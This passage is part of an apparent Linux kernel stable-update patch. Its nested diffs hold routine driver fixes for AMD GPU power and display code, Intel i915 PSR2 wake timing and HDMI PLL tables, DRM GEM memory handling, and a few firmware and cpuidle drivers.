+ 	depends on (MFD_HI655X_PMIC || COMPILE_TEST)
+-	depends on REGMAP
++	select REGMAP
+ 	default MFD_HI655X_PMIC
+ 	help
+ 	  This driver supports the hi655x PMIC clock. This
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index 821984947ed9b..fe06644725203 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -103,7 +103,8 @@ static void psci_pd_remove(void)
+ 	struct psci_pd_provider *pd_provider, *it;
+ 	struct generic_pm_domain *genpd;
+ 
+-	list_for_each_entry_safe(pd_provider, it, &psci_pd_providers, link) {
++	list_for_each_entry_safe_reverse(pd_provider, it,
++					 &psci_pd_providers, link) {
+ 		of_genpd_del_provider(pd_provider->node);
+ 
+ 		genpd = of_genpd_remove_last(pd_provider->node);
+diff --git a/drivers/firmware/xilinx/zynqmp.c b/drivers/firmware/xilinx/zynqmp.c
+index ff5cabe70a2b2..6587fa8570dc6 100644
+--- a/drivers/firmware/xilinx/zynqmp.c
++++ b/drivers/firmware/xilinx/zynqmp.c
+@@ -206,7 +206,7 @@ static int do_feature_check_call(const u32 api_id)
+ 	}
+ 
+ 	/* Add new entry if not present */
+-	feature_data = kmalloc(sizeof(*feature_data), GFP_KERNEL);
++	feature_data = kmalloc(sizeof(*feature_data), GFP_ATOMIC);
+ 	if (!feature_data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index 087147f09933a..3b8825a3e2336 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1695,7 +1695,7 @@ static int psp_hdcp_initialize(struct psp_context *psp)
+ 	psp->hdcp_context.context.mem_context.shared_mem_size = PSP_HDCP_SHARED_MEM_SIZE;
+ 	psp->hdcp_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->hdcp_context.context.initialized) {
++	if (!psp->hdcp_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->hdcp_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1762,7 +1762,7 @@ static int psp_dtm_initialize(struct psp_context *psp)
+ 	psp->dtm_context.context.mem_context.shared_mem_size = PSP_DTM_SHARED_MEM_SIZE;
+ 	psp->dtm_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->dtm_context.context.initialized) {
++	if (!psp->dtm_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->dtm_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1830,7 +1830,7 @@ static int psp_rap_initialize(struct psp_context *psp)
+ 	psp->rap_context.context.mem_context.shared_mem_size = PSP_RAP_SHARED_MEM_SIZE;
+ 	psp->rap_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->rap_context.context.initialized) {
++	if (!psp->rap_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->rap_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index 65a1d4f9004ba..a75e1af77365d 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -59,6 +59,7 @@ static int kfd_gtt_sa_init(struct kfd_dev *kfd, unsigned int buf_size,
+ 				unsigned int chunk_size);
+ static void kfd_gtt_sa_fini(struct kfd_dev *kfd);
+ 
++static int kfd_resume_iommu(struct kfd_dev *kfd);
+ static int kfd_resume(struct kfd_dev *kfd);
+ 
+ static void kfd_device_info_set_sdma_info(struct kfd_dev *kfd)
+@@ -634,7 +635,7 @@ bool kgd2kfd_device_init(struct kfd_dev *kfd,
+ 
+ 	svm_migrate_init(kfd->adev);
+ 
+-	if (kgd2kfd_resume_iommu(kfd))
++	if (kfd_resume_iommu(kfd))
+ 		goto device_iommu_error;
+ 
+ 	if (kfd_resume(kfd))
+@@ -782,6 +783,14 @@ int kgd2kfd_resume(struct kfd_dev *kfd, bool run_pm)
+ }
+ 
+ int kgd2kfd_resume_iommu(struct kfd_dev *kfd)
++{
++	if (!kfd->init_complete)
++		return 0;
++
++	return kfd_resume_iommu(kfd);
++}
++
++static int kfd_resume_iommu(struct kfd_dev *kfd)
+ {
+ 	int err = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_events.c b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+index 729d26d648af3..2880ed96ac2e3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_events.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+@@ -778,16 +778,13 @@ static struct kfd_event_waiter *alloc_event_waiters(uint32_t num_events)
+ 	struct kfd_event_waiter *event_waiters;
+ 	uint32_t i;
+ 
+-	event_waiters = kmalloc_array(num_events,
+-					sizeof(struct kfd_event_waiter),
+-					GFP_KERNEL);
++	event_waiters = kcalloc(num_events, sizeof(struct kfd_event_waiter),
++				GFP_KERNEL);
+ 	if (!event_waiters)
+ 		return NULL;
+ 
+-	for (i = 0; (event_waiters) && (i < num_events) ; i++) {
++	for (i = 0; i < num_events; i++)
+ 		init_wait(&event_waiters[i].wait);
+-		event_waiters[i].activated = false;
+-	}
+ 
+ 	return event_waiters;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 8c50457112649..c20e9f76f0213 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -992,8 +992,5 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
+-
+-	dc_dmub_srv_p_state_delegate(dc,
+-		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index d70c64a9fcb2c..26fc5cad7a770 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1883,6 +1883,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	bool subvp_in_use = false;
+ 	uint8_t is_pipe_split_expected[MAX_PIPES] = {0};
+ 	struct dc_crtc_timing *timing;
++	bool vsr_odm_support = false;
+ 
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 
+@@ -1900,12 +1901,15 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
++		vsr_odm_support = (res_ctx->pipe_ctx[i].stream->src.width >= 5120 &&
++				res_ctx->pipe_ctx[i].stream->src.width > res_ctx->pipe_ctx[i].stream->dst.width);
+ 		if (context->stream_count == 1 &&
+ 				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+-				dc->debug.enable_single_display_2to1_odm_policy) {
++				dc->debug.enable_single_display_2to1_odm_policy &&
++				!vsr_odm_support) { //excluding 2to1 ODM combine on >= 5k vsr
+ 			pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_2to1;
+ 		}
+ 		pipe_cnt++;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 479e2c1a13018..49da8119b28e9 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -1802,7 +1802,10 @@ static unsigned int CalculateVMAndRowBytes(
+ 	}
+ 
+ 	if (SurfaceTiling == dm_sw_linear) {
+-		*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
++		if (PTEBufferSizeInRequests == 0)
++			*dpte_row_height = 1;
++		else
++			*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
+ 		*dpte_row_width_ub = (dml_ceil(((double) SwathWidth - 1) / *PixelPTEReqWidth, 1) + 1) * *PixelPTEReqWidth;
+ 		*PixelPTEBytesPerRow = *dpte_row_width_ub / *PixelPTEReqWidth * *PTERequestSize;
+ 	} else if (ScanDirection != dm_vert) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+index f77401709d83c..2162ecd1057d1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+@@ -27,7 +27,7 @@
+ // *** IMPORTANT ***
+ // SMU TEAM: Always increment the interface version if
+ // any structure is changed in this file
+-#define PMFW_DRIVER_IF_VERSION 7
++#define PMFW_DRIVER_IF_VERSION 8
+ 
+ typedef struct {
+   int32_t value;
+@@ -198,7 +198,7 @@ typedef struct {
+   uint16_t SkinTemp;
+   uint16_t DeviceState;
+   uint16_t CurTemp;                     //[centi-Celsius]
+-  uint16_t spare2;
++  uint16_t FilterAlphaValue;
+ 
+   uint16_t AverageGfxclkFrequency;
+   uint16_t AverageFclkFrequency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 992163e66f7b4..bffa6247c3cda 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -29,7 +29,7 @@
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 697e98a0a20ab..75f18681e984c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2143,16 +2143,9 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 		(OverDriveTable_t *)smu->smu_table.boot_overdrive_table;
+ 	OverDriveTable_t *user_od_table =
+ 		(OverDriveTable_t *)smu->smu_table.user_overdrive_table;
++	OverDriveTable_t user_od_table_bak;
+ 	int ret = 0;
+ 
+-	/*
+-	 * For S3/S4/Runpm resume, no need to setup those overdrive tables again as
+-	 *   - either they already have the default OD settings got during cold bootup
+-	 *   - or they have some user customized OD settings which cannot be overwritten
+-	 */
+-	if (smu->adev->in_suspend)
+-		return 0;
+-
+ 	ret = smu_cmn_update_table(smu, SMU_TABLE_OVERDRIVE,
+ 				   0, (void *)boot_od_table, false);
+ 	if (ret) {
+@@ -2163,7 +2156,23 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 	sienna_cichlid_dump_od_table(smu, boot_od_table);
+ 
+ 	memcpy(od_table, boot_od_table, sizeof(OverDriveTable_t));
+-	memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++
++	/*
++	 * For S3/S4/Runpm resume, we need to setup those overdrive tables again,
++	 * but we have to preserve user defined values in "user_od_table".
++	 */
++	if (!smu->adev->in_suspend) {
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		smu->user_dpm_profile.user_od = false;
++	} else if (smu->user_dpm_profile.user_od) {
++		memcpy(&user_od_table_bak, user_od_table, sizeof(OverDriveTable_t));
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		user_od_table->GfxclkFmin = user_od_table_bak.GfxclkFmin;
++		user_od_table->GfxclkFmax = user_od_table_bak.GfxclkFmax;
++		user_od_table->UclkFmin = user_od_table_bak.UclkFmin;
++		user_od_table->UclkFmax = user_od_table_bak.UclkFmax;
++		user_od_table->VddGfxOffset = user_od_table_bak.VddGfxOffset;
++	}
+ 
+ 	return 0;
+ }
+@@ -2373,6 +2382,20 @@ static int sienna_cichlid_od_edit_dpm_table(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int sienna_cichlid_restore_user_od_settings(struct smu_context *smu)
++{
++	struct smu_table_context *table_context = &smu->smu_table;
++	OverDriveTable_t *od_table = table_context->overdrive_table;
++	OverDriveTable_t *user_od_table = table_context->user_overdrive_table;
++	int res;
++
++	res = smu_v11_0_restore_user_od_settings(smu);
++	if (res == 0)
++		memcpy(od_table, user_od_table, sizeof(OverDriveTable_t));
++
++	return res;
++}
++
+ static int sienna_cichlid_run_btc(struct smu_context *smu)
+ {
+ 	int res;
+@@ -4400,7 +4423,7 @@ static const struct pptable_funcs sienna_cichlid_ppt_funcs = {
+ 	.set_soft_freq_limited_range = smu_v11_0_set_soft_freq_limited_range,
+ 	.set_default_od_settings = sienna_cichlid_set_default_od_settings,
+ 	.od_edit_dpm_table = sienna_cichlid_od_edit_dpm_table,
+-	.restore_user_od_settings = smu_v11_0_restore_user_od_settings,
++	.restore_user_od_settings = sienna_cichlid_restore_user_od_settings,
+ 	.run_btc = sienna_cichlid_run_btc,
+ 	.set_power_source = smu_v11_0_set_power_source,
+ 	.get_pp_feature_mask = smu_cmn_get_pp_feature_mask,
+diff --git a/drivers/gpu/drm/drm_gem.c b/drivers/gpu/drm/drm_gem.c
+index 8b68a3c1e6ab6..b87ed4238fc83 100644
+--- a/drivers/gpu/drm/drm_gem.c
++++ b/drivers/gpu/drm/drm_gem.c
+@@ -1351,10 +1351,13 @@ EXPORT_SYMBOL(drm_gem_lru_move_tail);
+  *
+  * @lru: The LRU to scan
+  * @nr_to_scan: The number of pages to try to reclaim
++ * @remaining: The number of pages left to reclaim, should be initialized by caller
+  * @shrink: Callback to try to shrink/reclaim the object.
+  */
+ unsigned long
+-drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++drm_gem_lru_scan(struct drm_gem_lru *lru,
++		 unsigned int nr_to_scan,
++		 unsigned long *remaining,
+ 		 bool (*shrink)(struct drm_gem_object *obj))
+ {
+ 	struct drm_gem_lru still_in_lru;
+@@ -1393,8 +1396,10 @@ drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
+ 		 * hit shrinker in response to trying to get backing pages
+ 		 * for this obj (ie. while it's lock is already held)
+ 		 */
+-		if (!dma_resv_trylock(obj->resv))
++		if (!dma_resv_trylock(obj->resv)) {
++			*remaining += obj->size >> PAGE_SHIFT;
+ 			goto tail;
++		}
+ 
+ 		if (shrink(obj)) {
+ 			freed += obj->size >> PAGE_SHIFT;
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 7af9da886d4e5..5fdc608043e76 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,11 +622,14 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
+-		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+-		drm_gem_object_put(obj);
+ 		vma->vm_private_data = NULL;
++		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
++
++		/* Drop the reference drm_gem_mmap_obj() acquired.*/
++		if (!ret)
++			drm_gem_object_put(obj);
+ 
+-		return dma_buf_mmap(obj->dma_buf, vma, 0);
++		return ret;
+ 	}
+ 
+ 	ret = drm_gem_shmem_get_pages(shmem);
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 135dbcab62b28..63b7105e818a6 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1604,6 +1604,8 @@ struct intel_psr {
+ 	bool psr2_sel_fetch_cff_enabled;
+ 	bool req_psr2_sdp_prior_scanline;
+ 	u8 sink_sync_latency;
++	u8 io_wake_lines;
++	u8 fast_wake_lines;
+ 	ktime_t last_entry_attempt;
+ 	ktime_t last_exit;
+ 	bool sink_not_reliable;
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index 15c3e448aa0e6..bf18423c7a005 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -542,6 +542,14 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 	val |= EDP_PSR2_FRAME_BEFORE_SU(max_t(u8, intel_dp->psr.sink_sync_latency + 1, 2));
+ 	val |= intel_psr2_get_tp_time(intel_dp);
+ 
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		if (intel_dp->psr.io_wake_lines < 9 &&
++		    intel_dp->psr.fast_wake_lines < 9)
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		else
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_3;
++	}
++
+ 	/* Wa_22012278275:adl-p */
+ 	if (IS_ADLP_DISPLAY_STEP(dev_priv, STEP_A0, STEP_E0)) {
+ 		static const u8 map[] = {
+@@ -558,31 +566,21 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 		 * Still using the default IO_BUFFER_WAKE and FAST_WAKE, see
+ 		 * comments bellow for more information
+ 		 */
+-		u32 tmp, lines = 7;
+-
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		u32 tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.io_wake_lines - TGL_EDP_PSR2_IO_BUFFER_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_IO_BUFFER_WAKE_SHIFT;
+ 		val |= tmp;
+ 
+-		tmp = map[lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
++		tmp = map[intel_dp->psr.fast_wake_lines - TGL_EDP_PSR2_FAST_WAKE_MIN_LINES];
+ 		tmp = tmp << TGL_EDP_PSR2_FAST_WAKE_MIN_SHIFT;
+ 		val |= tmp;
+ 	} else if (DISPLAY_VER(dev_priv) >= 12) {
+-		/*
+-		 * TODO: 7 lines of IO_BUFFER_WAKE and FAST_WAKE are default
+-		 * values from BSpec. In order to setting an optimal power
+-		 * consumption, lower than 4k resolution mode needs to decrease
+-		 * IO_BUFFER_WAKE and FAST_WAKE. And higher than 4K resolution
+-		 * mode needs to increase IO_BUFFER_WAKE and FAST_WAKE.
+-		 */
+-		val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
+-		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= TGL_EDP_PSR2_FAST_WAKE(7);
++		val |= TGL_EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= TGL_EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	} else if (DISPLAY_VER(dev_priv) >= 9) {
+-		val |= EDP_PSR2_IO_BUFFER_WAKE(7);
+-		val |= EDP_PSR2_FAST_WAKE(7);
++		val |= EDP_PSR2_IO_BUFFER_WAKE(intel_dp->psr.io_wake_lines);
++		val |= EDP_PSR2_FAST_WAKE(intel_dp->psr.fast_wake_lines);
+ 	}
+ 
+ 	if (intel_dp->psr.req_psr2_sdp_prior_scanline)
+@@ -837,6 +835,46 @@ static bool _compute_psr2_sdp_prior_scanline_indication(struct intel_dp *intel_d
+ 	return true;
+ }
+ 
++static bool _compute_psr2_wake_times(struct intel_dp *intel_dp,
++				     struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = dp_to_i915(intel_dp);
++	int io_wake_lines, io_wake_time, fast_wake_lines, fast_wake_time;
++	u8 max_wake_lines;
++
++	if (DISPLAY_VER(i915) >= 12) {
++		io_wake_time = 42;
++		/*
++		 * According to Bspec it's 42us, but based on testing
++		 * it is not enough -> use 45 us.
++		 */
++		fast_wake_time = 45;
++		max_wake_lines = 12;
++	} else {
++		io_wake_time = 50;
++		fast_wake_time = 32;
++		max_wake_lines = 8;
++	}
++
++	io_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, io_wake_time);
++	fast_wake_lines = intel_usecs_to_scanlines(
++		&crtc_state->uapi.adjusted_mode, fast_wake_time);
++
++	if (io_wake_lines > max_wake_lines ||
++	    fast_wake_lines > max_wake_lines)
++		return false;
++
++	if (i915->params.psr_safest_params)
++		io_wake_lines = fast_wake_lines = max_wake_lines;
++
++	/* According to Bspec lower limit should be set as 7 lines. */
++	intel_dp->psr.io_wake_lines = max(io_wake_lines, 7);
++	intel_dp->psr.fast_wake_lines = max(fast_wake_lines, 7);
++
++	return true;
++}
++
+ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 				    struct intel_crtc_state *crtc_state)
+ {
+@@ -930,6 +968,12 @@ static bool intel_psr2_config_valid(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	if (!_compute_psr2_wake_times(intel_dp, crtc_state)) {
++		drm_dbg_kms(&dev_priv->drm,
++			    "PSR2 not enabled, Unable to use long enough wake times\n");
++		return false;
++	}
++
+ 	if (HAS_PSR2_SEL_FETCH(dev_priv)) {
+ 		if (!intel_psr2_sel_fetch_config_valid(intel_dp, crtc_state) &&
+ 		    !HAS_PSR_HW_TRACKING(dev_priv)) {
+diff --git a/drivers/gpu/drm/i915/display/intel_snps_phy.c b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+index 937cefd6f78f7..3326c79c78a0d 100644
+--- a/drivers/gpu/drm/i915/display/intel_snps_phy.c
++++ b/drivers/gpu/drm/i915/display/intel_snps_phy.c
+@@ -1418,6 +1418,36 @@ static const struct intel_mpllb_state dg2_hdmi_262750 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_267300 = {
++	.clock = 267300,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 7) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 3),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 74) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 30146) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 36699),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_268500 = {
+ 	.clock = 268500,
+ 	.ref_control =
+@@ -1508,6 +1538,36 @@ static const struct intel_mpllb_state dg2_hdmi_241500 = {
+ 		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
+ };
+ 
++static const struct intel_mpllb_state dg2_hdmi_319890 = {
++	.clock = 319890,
++	.ref_control =
++		REG_FIELD_PREP(SNPS_PHY_REF_CONTROL_REF_RANGE, 3),
++	.mpllb_cp =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT, 6) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP, 14) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_INT_GS, 64) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_CP_PROP_GS, 124),
++	.mpllb_div =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_DIV5_CLK_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_TX_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_PMIX_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_V2I, 2) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FREQ_VCO, 2),
++	.mpllb_div2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_REF_CLK_DIV, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_MULTIPLIER, 94) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_HDMI_DIV, 1),
++	.mpllb_fracn1 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_CGG_UPDATE_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_EN, 1) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_DEN, 65535),
++	.mpllb_fracn2 =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_QUOT, 64094) |
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_FRACN_REM, 13631),
++	.mpllb_sscen =
++		REG_FIELD_PREP(SNPS_PHY_MPLLB_SSC_UP_SPREAD, 1),
++};
++
+ static const struct intel_mpllb_state dg2_hdmi_497750 = {
+ 	.clock = 497750,
+ 	.ref_control =
+@@ -1695,8 +1755,10 @@ static const struct intel_mpllb_state * const dg2_hdmi_tables[] = {
+ 	&dg2_hdmi_209800,
+ 	&dg2_hdmi_241500,
+ 	&dg2_hdmi_262750,
++	&dg2_hdmi_267300,
+ 	&dg2_hdmi_268500,
+ 	&dg2_hdmi_296703,
++	&dg2_hdmi_319890,
+ 	&dg2_hdmi_497750,
+ 	&dg2_hdmi_592000,
+ 	&dg2_hdmi_593407,
+diff --git a/drivers/gpu/drm/i915/gt/intel_sseu.h b/drivers/gpu/drm/i915/gt/intel_sseu.h
+index aa87d3832d60d..d7e8c374f153e 100644
+--- a/drivers/gpu/drm/i915/gt/intel_sseu.h
++++ b/drivers/gpu/drm/i915/gt/intel_sseu.h
+@@ -27,7 +27,7 @@ struct drm_printer;
+  * is only relevant to pre-Xe_HP platforms (Xe_HP and beyond use the
+  * I915_MAX_SS_FUSE_BITS value below).
+  */
+-#define GEN_MAX_SS_PER_HSW_SLICE	6
++#define GEN_MAX_SS_PER_HSW_SLICE	8
+ 
+ /*
+  * Maximum number of 32-bit registers used by hardware to express the
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index 7412abf166a8c..a9fea115f2d26 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -422,12 +422,12 @@ replace_barrier(struct i915_active *ref, struct i915_active_fence *active)
+ 	 * we can use it to substitute for the pending idle-barrer
+ 	 * request that we want to emit on the kernel_context.
+ 	 */
+-	__active_del_barrier(ref, node_from_active(active));
+-	return true;
